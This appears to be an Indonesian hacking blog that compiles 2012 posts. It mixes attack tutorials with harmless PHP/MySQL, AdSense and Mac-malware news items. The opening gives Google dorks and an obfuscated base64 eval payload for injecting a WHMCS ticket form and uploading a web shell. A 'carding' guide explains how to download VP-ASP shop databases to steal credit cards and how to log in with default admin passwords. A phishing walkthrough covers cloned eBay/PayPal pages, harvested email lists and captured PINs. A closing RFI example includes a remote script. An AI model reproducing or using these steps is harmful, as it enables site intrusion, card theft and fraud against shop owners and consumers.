- inurl:help/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:secure/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:store/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:whmcs/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:log/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:myaccount/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:orders/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:order/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:portal/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:mc/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:office/submitticket.php intext:Powered by WHMCompleteSolution
- inurl:submitticket.php site:com intext:Powered by WHMCompleteSolution
- inurl:submitticket.php site:org intext:Powered by WHMCompleteSolution
- inurl:submitticket.php site:net intext:Powered by WHMCompleteSolution
- inurl:submitticket.php site:info intext:Powered by WHMCompleteSolution
- inurl:".*/*/submitticket.php" intext:Powered by WHMCompleteSolution
- inurl:".*/submitticket.php"
#Injector : cart.php?a=test&templatefile=../../../
Kita Bahas HAck WHMCS Submittiket Dullu ya .. _
Ini Exploit nya . Taro Di Subject ya .->
{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJ
oke skarang Buka Google TAruh Dork .. Yang Diatas Untk Teknik Submitticket Kalo Sudah Buka Web yg TerPilih ( kaya Gubernur Aja Harus Dipilih :D )Contoh ss .
Jika Sudah Masuk
Liat SS nya LAgi .
Nah Kita Succsees Buat / daftar Submitticket ..
Sekarang Tinggal Buka Dehh ..
Contoh .: www.domain.co/whmcs/submitticket.php?step=2&deptid=1di
ubah Jadi : www.domaint.co/whmcs/downloads/indexx.phpHasil
TinggaL Upload Dehh Shell Kalian .
contoh : www.domain.co/whmcs/downloads/indexx.php
Jadi : www.domain.co/whmcs/downloads/namashell.phpLiat SS : http://a6.sphotos.ak.fbcdn.net/hphotos-ak-ash3/578572_167735916697117_192801804_n.jpgOke
Sekian Dullu Ya . Teknik Exploit Inject Nya Lanjut Besok ....
Pegel Juga Yahh .. Hufttt Hadohhhh ... :D
Inti nya Jangan Putus Asa Bila Tidak Bisa CAri Target Yang Lainnnn ... :D
Owned By Detol Seven Crew
And
All Team Seven Crew ..
Sabtu, 04 Agustus 2012
Virus Baru Tembus Pertahanan Apple
Symantec memperingatkan virus itu berpotensi menjadi mata-mata, mencuri data-data penting dari komputer yang dijangkiti
Intego, perusahaan keamanan komputer yang mengkhususkan diri pada produk-produk Apple, mengklaim menemukan virus trojan baru yang bisa menyerang sistem operasi Mac. Virus bernama OS/X Crisis itu bisa terinstall sendiri dan bersembunyi dengan rapi jika terinstall dalam bentuk root.
Ancaman virus baru itu, sejauh ini baru ditemukan dalam dua versi, Snow Leopard dan Lion.
Menurut Intego OS/X Crisis adalah sejenis Trojan dropper, sejenis malware yang bisa menyamar sebagai game, screen saver, atau file musik. Virus ini bisa menginstal disi sendiri tanpa diketahui pengguna komputer, menutup jejaknya, dan menyembunyikan keberadaanya.
"Virus itu besuaha keras untuk bersembunyi, hal yang tidak biasa pada virus-virus trojan yang menyasar Mac," jelas Lysa Myers, peneliti paad Intego sambil menambahkan kebiasaan bersembunyi itu hanya biasa ditemukan pada trojan yang menyerang komputer berbasis Windows.
Trojan biasanya menciptakan file yang dinamai secara acak agar tidak mudah terlacak. Meski demikian sejumlah nama selalu muncul dan pengguna bisa mencarinya lalu memeriksa jika file-file terinfeksi virus.
Meski demikian, menurut Symantec OS/X Crisis tergolong virus tingkat bahaya dan daya rusaknya rendah. Tetapi di sisi lain, Symantec memperingatkan bahwa virus itu berpotensi menjadi mata-mata, mencuri data-data penting dari komputer yang dijangkiti.
Seperti yang diberitakan sebelumnya, komputer-komputer Apple kini tidak lagi bisa dikatakan aman dari virus. Apple sendiri telah menyadari hal itu terutama setelah pada April silam lebih dari setengah juta unit Mac terserang trojan.
Intego, perusahaan keamanan komputer yang mengkhususkan diri pada produk-produk Apple, mengklaim menemukan virus trojan baru yang bisa menyerang sistem operasi Mac. Virus bernama OS/X Crisis itu bisa terinstall sendiri dan bersembunyi dengan rapi jika terinstall dalam bentuk root.
Ancaman virus baru itu, sejauh ini baru ditemukan dalam dua versi, Snow Leopard dan Lion.
Menurut Intego OS/X Crisis adalah sejenis Trojan dropper, sejenis malware yang bisa menyamar sebagai game, screen saver, atau file musik. Virus ini bisa menginstal disi sendiri tanpa diketahui pengguna komputer, menutup jejaknya, dan menyembunyikan keberadaanya.
"Virus itu besuaha keras untuk bersembunyi, hal yang tidak biasa pada virus-virus trojan yang menyasar Mac," jelas Lysa Myers, peneliti paad Intego sambil menambahkan kebiasaan bersembunyi itu hanya biasa ditemukan pada trojan yang menyerang komputer berbasis Windows.
Trojan biasanya menciptakan file yang dinamai secara acak agar tidak mudah terlacak. Meski demikian sejumlah nama selalu muncul dan pengguna bisa mencarinya lalu memeriksa jika file-file terinfeksi virus.
Meski demikian, menurut Symantec OS/X Crisis tergolong virus tingkat bahaya dan daya rusaknya rendah. Tetapi di sisi lain, Symantec memperingatkan bahwa virus itu berpotensi menjadi mata-mata, mencuri data-data penting dari komputer yang dijangkiti.
Seperti yang diberitakan sebelumnya, komputer-komputer Apple kini tidak lagi bisa dikatakan aman dari virus. Apple sendiri telah menyadari hal itu terutama setelah pada April silam lebih dari setengah juta unit Mac terserang trojan.
Kamis, 14 Juni 2012
bandwiht stole through mozilla
There
are many ways to outsmart a slow Internet connection, especially since
you use the internet access in the cafe-cafe that most of them have
limited bandwidth of every computer. Here are some tips and tricks you can try:1). Open the Mozilla Firefox Browser2). In the Address Bar Type: ABOUT: CONFIG3). Find the string below: (make sure all srting under the "TRUE")menggantingnya example:Network.http.pipelining FALSE ==> right click and select "Toggle"Network.http.pipelining TRUENetwork.http.pipelining.maxrequests 64Network.http.proxy.pipelining TRUENETWORK.PROXY.SHARE_PROXY_SETTINGS FALSE <=== this should be False4). create a new srting how: Click the Left 1X Anywhere, Right click NEW >> INTEGER5). Type: 0 Rate nglayout.initialpaint.delay6). Then REFRESH or F57). In the Address Bar Type: ABOUT: BLANKClick the Menu:For OS Windows XP TOOLS >> OPTIONS >> WEB FEATURESFor Linux OS (Vector) EDIT >> PREFERENCESFor different settings across multiple OS EDIT >> ADVANCED9). On Option:ALLOW WEB SITES TO INSTALL SOFTWARE Give Signs Check Box To enable the10). Then press OK Then REFRESH (F5)11). Go To Link It:https://addons.mozilla.org/extensions/mo ...or:https://addons.mozilla.org/extensions/mo ...12). Download SwitchProxy Tool Software Version 1.3.413). After Done Do not Press the Button UPDATE14). Click the sign of X (close) What's In the Upper Right Corner Of POP UP Window Appears15). Close All Browsers Mozilla FireFox,16). Then Open Again To Switch Software Version 1.3.4 SwitchProxy Tool That's the last Install17). If Installation Success, Will Appear Under additional Toolbar Navigation Toolbar & Address Bar.Mozilla Browser Now Ready For UseNote:-
SwitchProxy Tool Software Version 1.3.4 This is in addition to Proxy
Automatically Mozilla FireFox Browser, also Engine Impact of Internet
Connection Speed-
How It's Very Effective When Used On The Solid Online for figuring
Sucking Bandwidth (Majority speed Internet access) Go to Who's Your
Computer Use- Significant Changes That Happened On The Internet connection Broadband / VSAT.
Minggu, 03 Juni 2012
TuTorial Carding VP-ASP Shopping Cart Versi: 5.00
et's get started:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find a VP-ASP 5.00 site?
Type: VP-ASP Shopping Cart
Version: 5.00
How to find a VP-ASP 5.00 site?
VP-ASP 5.00 Finding a site is very simple?
A. Go to google.com and type in: VP-ASP Shopping Cart 5.00
2. You will find many sites with VP-ASP cart software installed 5.00
Now let's go to exploit ..
Page will be like this: **** :/ / ***. victim.com / shop / shopdisplaycategories.asp
Utilize are: diag_dbtest.asp
Now you need to do this: **** :/ / ***. victim.com / shop / diag_dbtest.asp
A page will appear with the people:
xdatabase
shopping140
xDblocation
resx
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber
Example:
The most important thing here is xdatabase
xdatabase: shopping140
Ok, now the URL will be like this: **** :/ / ***. victim.com/shop/shopping140.mdb
? If you do not download t Database, try this while there dblocation:
xDblocation
resx
url will be: **** :/ / ***. victim.com/shop/resx/shopping140.mdb
If u see an error message that you should try this:
**** :/ / ***. Victim.com/shop/shopping500.mdb
Download mdb file and you should be able to open it with mdb file viewer, you should be able to find one on download.com, or use the MS Office Access.
Inside you should find the credit card information, and you even have to be able to find the admin username and password for the website.
Admin login page is usually located here: **** :/ / ***. victim.com / shop / shopadmin.asp
If you can not find the admin username and password in the passwd file, or you can but it is not true, or you can not find the mdb file at all, then try to find the admin login page and enter the default password is:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
2. Hacking Through Fraud
This method is usually used to hack to get the money. What happens in this method is that you create a clone page.
Target: basically eBay.com or paypal.com to the general credit card, or if u want to target a specific cashable bank as regionbank.com then u have to make a clone of the page for that bank.
What is eBay.com?
Its shopping sites around the world are used by many billions of people who use their credit cards on ebay. What do you do to make a similar page like eBay and upload it at some hosting that don? T has the legal limit, tried to find hosting in Europe they will make you a fraud for a long time, and email eBay user.
How to get emails from their users?
Go to google.com and type in "Email Harvestor" or Spider Email and search for eBay Buyers and Sellers eBay and u will get a long list. That this list is not accurate, but from 1000 1 email a minimum will apply. Atleast you will get some time.
Well u make a clone of the ebay page, and the letter u create a list of the spider with a message like "Your account has been hacked", or any reason that professional look, and ask them to visit the link below and enter your billing information , and our own fraud program when they enter their info comes straight to your email.
On the form page u have a PIN is required for u also get a PIN number through which u can cash via ATM ..
Now if u run a scam or fraud ebay paypal, up to luck who your victim. A client of Bank of America or Citibank, or the area, on his luck, maybe u get a cashable, maybe u are just unlucky, nothing else.
Search on google to download scam site and learn!
After you create your scam site, just find some spiders harvestor email or from the internet (good download on Bulk Email Software Superstore - Email Marketing Internet Advertising) and make a good email list.
And you need to find a mailer (send mass mailers) that sends a mass - email to any email with a message to update their account on fraud ur page). In from, use the email and used eBay@reply3.ebay.com subject: eBay - Update your eBay account and on eBay using the name
Some Tips:
A. Make sure you keep the hosting or a link in the email u will send, and when you visit the victims email, it will display the page can not be displayed, and your plan will fail.
2. The most difficult point is to find the hosting that remain in the scam. even i don t find easily, a very very difficult?.
3. Maybe u have any contact with someone who has a company or a co-location hosting and dedicated it to hide the fraud in some dedicated without restrictions.
4. Looking for a good email list (that means really good = user)
5. Your land mass mailing email software on a user's inbox.
That's all the reader. Hope you will find this tutorial useful. And remember, credit card hacking is illegal, it's just post the information and I am not responsible for the actions taken by you after reading this tutorial.
Waiting Tresno be accustomed pillar jalaran
ben pen ojo violent
a significant
Sabtu, 02 Juni 2012
Penerapan koneksi PHP ke Databash
Telah dijelaskan bahwa koneksi ke database merupakan salah satu
fitur PHP yang paling sering digunakan. Apalagi PHP juga telah
menyediakan fungsi-fungsi built in yang mendukung koneksi database ke
MySQL server. Nah, setelah Anda sedikit banyak tahu tentang MySQL,
kini saatnya untuk menerapkan pengetahuan tersebut untuk membuat
aplikasi web database dengan PHP dan MySQL.
Untuk keperluan contoh dan latihan, kita akan membuat sebuah database dengan MySQL. Buatlah sebuah database dengan nama datakontak sebagai berikut:
Tabel Kotak : Record-record untuk tbl_kontak
nama alamat telpon email tgl_lahir !!
Anton Jl. Angsa 1-123456 anton@anton.com 1975-01-01
Betty Jl. Belimbing 2-234567 betty@betty.net 1980-02-02
Charlie Jl. Cakra 3-345678 charlie@charlie.org 1974-03-03
Diana Jl. Durian 4-456789 diana@diana.tv 1979-04-04
Enggar Jl. Elang 5-567891 enggar@enggar.info 1982-05-05
Fifi Jl. Flamengo 6-678912 fifi@fifi.biz 1977-06-06
Gina Jl. Gelora 7-789123 gina@gina.com 1973-07-07
Kemudian buatlah sebuah file teks yang berisi teks sebagai berikut:
insert into tbl_kontak values ('Anton','Jl. Angsa 1','123456',' anton@anton.com','1975-01-01');
insert into tbl_kontak values ('Betty','Jl. Belimbing 2','234567',' betty@betty.net','1980-02-02');
insert into tbl_kontak values ('Charlie','Jl. Cakra 3','345678',' charlie@charlie.org','1974-03-03');
insert into tbl_kontak values ('Diana','Jl. Durian 4','456789',' diana@diana.tv','1979-04-04');
insert into tbl_kontak values ('Enggar','Jl. Elang 5','567891',' enggar@enggar.info','1982-05-05');
insert into tbl_kontak values ('Fifi','Jl. Flamengo 6','678912',' fifi@fifi.biz','1977-06-06');
insert into tbl_kontak values ('Gina','Jl. Gelora 7','789123',' gina@gina.com','1973-07-07');
Simpanlah file teks tersebut dengan nama misalnya tbl_kontak.sql, lalu jalankan perintah mysql dari prompt/shell sebagai berikut:
Nah, sekarang kita masuk ke aplikasi PHP yang akan mengakses database tersebut. Latihan pertama yang diberikan adalah mengakses atau melakukan koneksi ke server MySQL, mengambil query, dan menampilkan query tersebut ke halaman web.
Untuk melakukan koneksi ke database MySQL digunakan fungsi mysql_connect(). Fungsi ini merupakan jembatan antara aplikasi PHP dengan database MySQL. Sintaksnya adalah sebagai berikut:
Berikut ini adalah contoh skrip bagaimana mengakses tabel tbl_kontak dari database datakontak yang telah kita buat di awal artikel ini.
<title> Database Data Kontak </title>
$host = “localhost”;
$user = “root”;
$passwd = “root”;
$db = “datakontak”;
$sql = “select * from tbl_kontak”;
$conn = mysql_connect($host,$user,$passwd);
mysql_select_db($db);
$qry = mysql_query($sql);
?>
<table border=1><tr><td bgcolor="#f32142"> Nama </td><td bgcolor="#f32142"> Alamat </td><td bgcolor="#f32142"> Telpon </td><td bgcolor="#f32142"> Email </td><td bgcolor="#f32142"> Tanggal Lahir </td></tr>
<tr><td bgcolor="#f7efde"> =$row['nama']?> </td><td bgcolor="#f7efde"> =$row['alamat']?> </td><td bgcolor="#f7efde"> =$row['telpon']?> </td><td bgcolor="#f7efde"> =$row['email']?> </td><td bgcolor="#f7efde"> =$row['tgl_lahir']?> </td></tr>
</table>Simpanlah skrip tersebut dengan nama data-kontak.php.
Jika dijalankan skrip tersebut akan nampak seperti ini.
posted : http://forum.indonesianbacktrack.or.id/showthread.php?tid=1656
Tak Akan Pernah Berhasil Jika Tidak Pernah Mencoba Dan Gagal !!
Foto InI Hampir MenyamaI SQL Maap Yang Di Perintahkan Oleh CMD <cd></cd> SQL Map !!
Untuk keperluan contoh dan latihan, kita akan membuat sebuah database dengan MySQL. Buatlah sebuah database dengan nama datakontak sebagai berikut:
mysql> create database datakontak;Pilihlah database tersebut sebagai database aktif.
mysql> use datakontak;Buatlah sebuah tabel baru dengan nama tbl_kontak sebagai berikut:
mysql> create table tbl_kontak(Tabel ini adalah contoh suatu tabel daftar nama kontak. Isikan tabel tersebut dengan data-data yang terdapat pada tabel di bawah ini:
-> nama varchar(20),
-> alamat varchar(30),
-> telpon varchar(12),
-> email varchar(30),
-> tgl_lahir (date);
Tabel Kotak : Record-record untuk tbl_kontak
nama alamat telpon email tgl_lahir !!
Anton Jl. Angsa 1-123456 anton@anton.com 1975-01-01
Betty Jl. Belimbing 2-234567 betty@betty.net 1980-02-02
Charlie Jl. Cakra 3-345678 charlie@charlie.org 1974-03-03
Diana Jl. Durian 4-456789 diana@diana.tv 1979-04-04
Enggar Jl. Elang 5-567891 enggar@enggar.info 1982-05-05
Fifi Jl. Flamengo 6-678912 fifi@fifi.biz 1977-06-06
Gina Jl. Gelora 7-789123 gina@gina.com 1973-07-07
Kemudian buatlah sebuah file teks yang berisi teks sebagai berikut:
insert into tbl_kontak values ('Anton','Jl. Angsa 1','123456',' anton@anton.com','1975-01-01');
insert into tbl_kontak values ('Betty','Jl. Belimbing 2','234567',' betty@betty.net','1980-02-02');
insert into tbl_kontak values ('Charlie','Jl. Cakra 3','345678',' charlie@charlie.org','1974-03-03');
insert into tbl_kontak values ('Diana','Jl. Durian 4','456789',' diana@diana.tv','1979-04-04');
insert into tbl_kontak values ('Enggar','Jl. Elang 5','567891',' enggar@enggar.info','1982-05-05');
insert into tbl_kontak values ('Fifi','Jl. Flamengo 6','678912',' fifi@fifi.biz','1977-06-06');
insert into tbl_kontak values ('Gina','Jl. Gelora 7','789123',' gina@gina.com','1973-07-07');
Simpanlah file teks tersebut dengan nama misalnya tbl_kontak.sql, lalu jalankan perintah mysql dari prompt/shell sebagai berikut:
# mysql datakontak < tbl_kontak.sqlatau
c:\mysql\bin> mysql datakontak < tbl_kontak.sqlUntuk memeriksa apakah pengisian data tersebut berhasil, maka buatlah query sebagai berikut:
Hasil yang diberikan seharusnya akan sama persis dengan yang terlihat pada Tabel Kontak.
myqsl> use datakontak;
mysql> select * from tbl_kontak;
Nah, sekarang kita masuk ke aplikasi PHP yang akan mengakses database tersebut. Latihan pertama yang diberikan adalah mengakses atau melakukan koneksi ke server MySQL, mengambil query, dan menampilkan query tersebut ke halaman web.
Untuk melakukan koneksi ke database MySQL digunakan fungsi mysql_connect(). Fungsi ini merupakan jembatan antara aplikasi PHP dengan database MySQL. Sintaksnya adalah sebagai berikut:
mysql_connect(host, user, password)Server adalah nama server yang merupakan host dari MySQL server, sedangkan user dan password adalah user dan password MySQL. Contoh:
$conn = mysql_connect('localhost','root','root')Setelah jembatan itu terbentuk, berikutnya adalah memilih database mana yang akan digunakan dalam aplikasi PHP. Fungsi yang digunakan adalah mysql_select_db(). Sintaksnya adalah sebagai berikut:
mysql_select_db(namadatabase[,koneksi])Parameter koneksi adalah variabel yang menyimpan koneksi ke MySQL server yang dilakukan oleh fungsi mysql_connect(). Contoh:
mysql_select_db('datakontak',$conn)Berikutnya adalah mengambil query dari database yang telah terkoneksi tersebut. Fungsi yang digunakan adalah mysql_query(). Sintaksnya adalah sebagai berikut:
mysql_query(perintahsql[,koneksi])Contoh:
$qry = mysql_query('select * from tbl_kontak',$conn)Yang terakhir adalah menampilkan hasil query tersebut ke halaman web. Fungsi yang digunakan adalah mysql_fetch_array(). Fungsi ini digunakan untuk memasukkan hasil query ke dalam array assosiatif dan/atau array numeris. Dalam bentuk variabel array, tentunya record-record tersebut kini bisa ditampilkan. Sintaks dari fungsi mysql_fetch_array() adalah sebagai berikut:
mysql_fetch_array(query)Query adalah hasil query yang didapatkan dari fungsi mysql_query(). Contoh:
$row = mysql_fetch_array($qry)Variabel $row inilah yang merupakan array yang menyimpan hasil query. Dengan demikian untuk menampilkan field-field pada query Anda dapat menggunakan $row[0], $row[1], dan seterusnya, atau $row['namafield1'], $row['namafield2'], dan seterusnya. Yang harus diperhatikan adalah bagaimana caranya kita menampilkan query tersebut sehingga sedap dipandang.
Berikut ini adalah contoh skrip bagaimana mengakses tabel tbl_kontak dari database datakontak yang telah kita buat di awal artikel ini.
<title> Database Data Kontak </title>
$host = “localhost”;
$user = “root”;
$passwd = “root”;
$db = “datakontak”;
$sql = “select * from tbl_kontak”;
$conn = mysql_connect($host,$user,$passwd);
mysql_select_db($db);
$qry = mysql_query($sql);
?>
<table border=1><tr><td bgcolor="#f32142"> Nama </td><td bgcolor="#f32142"> Alamat </td><td bgcolor="#f32142"> Telpon </td><td bgcolor="#f32142"> Email </td><td bgcolor="#f32142"> Tanggal Lahir </td></tr>
<tr><td bgcolor="#f7efde"> =$row['nama']?> </td><td bgcolor="#f7efde"> =$row['alamat']?> </td><td bgcolor="#f7efde"> =$row['telpon']?> </td><td bgcolor="#f7efde"> =$row['email']?> </td><td bgcolor="#f7efde"> =$row['tgl_lahir']?> </td></tr>
</table>Simpanlah skrip tersebut dengan nama data-kontak.php.
Jika dijalankan skrip tersebut akan nampak seperti ini.
posted : http://forum.indonesianbacktrack.or.id/showthread.php?tid=1656
Tak Akan Pernah Berhasil Jika Tidak Pernah Mencoba Dan Gagal !!
Foto InI Hampir MenyamaI SQL Maap Yang Di Perintahkan Oleh CMD <cd></cd> SQL Map !!
PengerTian Google Adsense . dan Cara Register Google Adsense Melaui BlogSpot .
AdSense adalah program kerjasama
periklanan melalui media Internet yang diselenggarakan oleh Google.
Melalui program periklanan AdSense, pemilik situs web atau blog yang
telah mendaftar dan disetujui keanggotaannya diperbolehkan memasang unit
iklan yang bentuk dan materinya telah ditentukan oleh Google di
halaman web mereka. Pemilik situs web atau blog akan mendapatkan
pemasukan berupa pembagian keuntungan dari Google untuk setiap iklan
yang diklik oleh pengunjung situs, yang dikenal sebagai sistem pay per click (ppc) atau bayar per klik.
Selain menyediakan iklan-iklan dengan sistem bayar per klik, Google AdSense juga menyediakan AdSense untuk pencarian (AdSense for Search) dan iklan arahan (Referral).
Pada AdSense untuk pencarian, pemilik situs web dapat memasang kotak
pencarian Google di halaman web mereka. Pemilik situs akan mendapatkan
pemasukan dari Google untuk setiap pencarian yang dilakukan
pengunjung melalui kotak pencarian tersebut, yang berlanjut dengan
klik pada iklan yang disertakan pada hasil pencarian. Pada iklan
arahan, pemilik situs akan menerima pemasukan setelah klik pada iklan
berlanjut dengan tindakan tertentu oleh pengunjung yang telah
disepakati antara Google dengan pemasang iklan tersebut.
Istilah-Istilah dalam AdSense
Publisher
Publisher adalah orang atau pemilik situs yang sudah bergabung dan memasang iklan AdSense di situs mereka.
Ad Units
Yang dimaksud dengan Ad Units
adalah iklan AdSense itu sendiri. Ad Units terdiri dari beberapa jenis
dan beberapa ukuran. Yang paling umum adalah jenis iklan teks. Pada
saat pengunjung mengklik unit iklan ini, maka (jika sah) pemasang iklan
akan mendapatkan pemasukan sesuai dengan nilai CPC-nya.
Link Units
Link Units hampir sama dengan Ad
Units, hanya saja formatnya mirip dengan format menu yang biasa kita
temui di situs-situs web. Yang membedakan Link Units dengan Ad Units
adalah pada saat pengunjung meng-klik iklan ini, maka ia akan diarahkan
pada halaman hasil pencarian di search engine Google. Publisher baru
akan mendapatkan pemasukan apabila pengunjung mengklik salah satu Ad
Unit yang ada di halaman tersebut. Pada prakteknya, Link Units terbukti
menghasilkan pemasukan lebih banyak dibandingkan Ad Units biasa.
AdSense for Content
AdSense for Content adalah iklan
AdSense yang dipasang di dalam suatu halaman. Iklan-iklan yang muncul
adalah iklan-iklan yang berhubungan dengan isi halaman tersebut. Atau
istilahnya menggunakan konsep kontekstual. Ad Units dan Link Units
adalah yang termasuk dalam AdSense for Content ini.
Alternate Ads
Pada
AdSense for Content, iklan tidak selalu muncul. Sebabnya antara lain
bisa karena memang stok iklan yang berhubungan dengan isi situs sudah
habis atau Google tidak dapat memperkirakan apa isi situs itu
sebenarnya. Jika ini terjadi, secara default, yang ditampilkan adalah
iklan layanan masyarakat atau sering dikenal dengan istilah PSA (Public Service Ads).
Karena bertipe donasi, maka jika diklik, iklan ini tidak menghasilkan
apa-apa bagi publisher. Untuk mengatasinya, Google memperbolehkan kita
untuk memasang Alternate Ads atau iklan alternatif. Jika Ad Units
yang dibuat telah diatur dengan menggunakan Alternate Ads, maka
apabila Ad Units tersebut tidak dapat tampil, yang muncul adalah iklan
alternatif yang telah diatur sebelumnya.
Channels
Channels adalah semacam label yang
dapat diberikan pada Ad Units, Link Units, AdSense for Search, dan
Referrals. Satu unit iklan dapat memiliki lebih dari satu label, dan
sebaliknya, satu label dapat digunakan untuk lebih dari satu unit
iklan. Di halaman laporan Google AdSense, hasil laporan akan
dikelompokkan berdasarkan Channels, sehingga penggunaan Channels akan
sangat memudahkan publisher untuk menganalisa performa AdSense mereka.
Umumnya, publisher akan memberikan nama Channels yang sama pada
unit-unit iklan yang ada di satu situs. Jika ingin lebih detail,
sah-sah saja untuk memberikan nama Channels yang berbeda pada setiap
unit iklan di masing-masing situs. Yang perlu diingat, maksimal jumlah
Channels yang diperbolehkan saat ini adalah 200 kanal.
Page Impressions
Page Impressions adalah jumlah yang
menunjukkan berapa kali halaman yang mengandung Ad Units dibuka oleh
pengunjung. Nilainya tidak terpengaruh oleh kuantitas Ad Units yang
ada di dalam halaman yang bersangkutan.
Clicks
Clicks adalah jumlah klik pada Ad
Units milik publisher. Dalam halaman laporan AdSense, publisher dapat
melihat total klik yang ia dapatkan, maupun berdasarkan Ad Units atau
Channelnya.
CTR (Clickthrough Rate)
CTR adalah perbandingan dalam
persen antara jumlah klik yang diterima suatu Ad Units dengan jumlah
tampilan Ad Units tersebut. Misalnya, satu Ad Units yang ditampilkan 40
kali dan diklik 10 kali memiliki nilai CTR 25% (10:40).
CPC (Cost Per Click)
CPC adalah jumlah uang yang akan
didapatkan oleh publisher apabila Ad Units tertentu diklik. Nilai CPC
masing-masing Ad Units berbeda dan ditentukan oleh banyak faktor,
termasuk performa dan kualitas situs milik publisher. Namun secara
umum, nilai maksimal yang mungkin adalah 20% dari nilai tawaran dinamis
yang ditawarkan oleh pemasang iklan.
eCPM (Effective CPM)
eCPM atau CPM (Cost Per Million)
adalah hasil pembagian antara jumlah pendapatan publisher dengan jumlah
impresi halaman (per 1.000) yang ia dapatkan dari iklan-iklannya.
Sebagai contoh, publisher yang menghasilkan USD 200 dari 50.000
impressi akan memiliki nilai CPM sebesar USD 4 (USD 200 dibagi 50).
Kebijakan program AdSense
Meski program AdSense memberikan
keuntungan yang besar, Google menetapkan aturan ketat untuk melindungi
kepentingan semua pihak yang terlibat, termasuk pemasang iklan yang
sering dirugikan oleh tindakan tidak terpuji pemilik situs anggota
program AdSense. Beberapa larangan Google yang harus ditaati pemilik
situs web atau blog peserta program AdSense adalah:
- Mengklik iklan yang ditampilkan situs milik sendiri, baik dengan cara manual atau dengan bantuan perangkat lunak khusus
- Dengan sengaja mendorong pengunjung situs untuk mengklik iklan yang ditampilkan, misalnya dengan kata-kata “klik iklan ini” atau “kunjungi halaman ini”
- Mengubah bentuk dan ukuran unit iklan yang telah ditentukan Google
- Membuat pranala langsung menuju halaman hasil pencarian AdSense untuk pencarian
- Mengisi secara otomatis kotak pencarian AdSense dengan kata kunci (keyword) tertentu
- Memanipulasi target iklan dengan katakunci tersembunyi atau dengan IFRAME
- Kode unit iklan AdSense harus ditempatkan langsung pada kode html Situs web tanpa perubahan. Pemilik situs tidak diperbolehkan mengubah kode AdSense dengan alasan apapun, misalnya dengan tujuan menampilkan hasil klik di jendela pop up atau mengalihkan target iklan.
Optimisasi Penghasilan AdSense
Potensi keuntungan mengikuti program AdSense
membuat banyak pemilik situs web mengembangkan berbagai metode untuk
meningkatkan jumlah klik pada iklan yang mereka tayangkan. Sebagian
metode terbukti ilegal dan melawan kebijakan resmi program AdSense.
Metode yang lain diperbolehkan, bahkan didorong penggunaannya oleh
Google. Beberapa metode yang dianggap sah adalah:- Memodifikasi warna unit iklan menggunakan palet warna yang disediakan AdSense
- Meletakkan unit iklan pada posisi tertentu pada halaman web yang dianggap memiliki tingkat keterbacaan tinggi
- Menghilangkan garis tepi unit iklan dan menyamakan warna latarnya
dengan warna latar halaman web sehingga unit iklan terlihat membaur
dengan isi halaman
Cara Paling Jitu Dan Manjur , Register Google Adsense Dengan Menggunakan Blogspot
Langsung Saja- Buat Email BAru Gmail
- Buat Blog Dengan Blogspot
- Posting Article Sekitar 11 [ Usahakan , Tanggal , Hari Dan Jam'nya Berbeda ] Dan Usahakan postingan Pertama Rubah Tahun Terbitnya Sekitar tahun 2011
- Gunakan Template Standar Blogspot ( jangan Ada Readmore ) Biarkan Saja Default
- buat 4 Navigasi [ Home . Contack . Privacy Policy . Sitemap ]
- Usahakan Yang 11 postingan Lebih Dari 800 Kata Dan Ada Gambar
- Seting 5 Article Di Home PAge .
- Sumbsit Url Blog Ke Goolge dan Webmaster usahakan Dapat Status Verifikasi dari Goolge
- Setelah Umur Blog Anda 1 minggu Registrasi Ke Google Adsense Lewat BlogSpot .
- finish Dan Nikmati Uang $999.99/Day .
Remote File Inclusion
Mungkin bagi sebagian teman-teman
bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian
teman-teman yang biasa bergelut dengan komputer security pasti telah
sering mendengar apa yang disebut dengan Remote File Inclusion atau
biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk
serangan secara remote yang memanfaatkan kelemahan script pada suatu
halaman website karena tidak tersanitasi dengan baik, dengan cara
menyisipkan script lain untuk exploitasi,
Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:
…
include($my_ms[”root”].’/error.php’);
…
Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
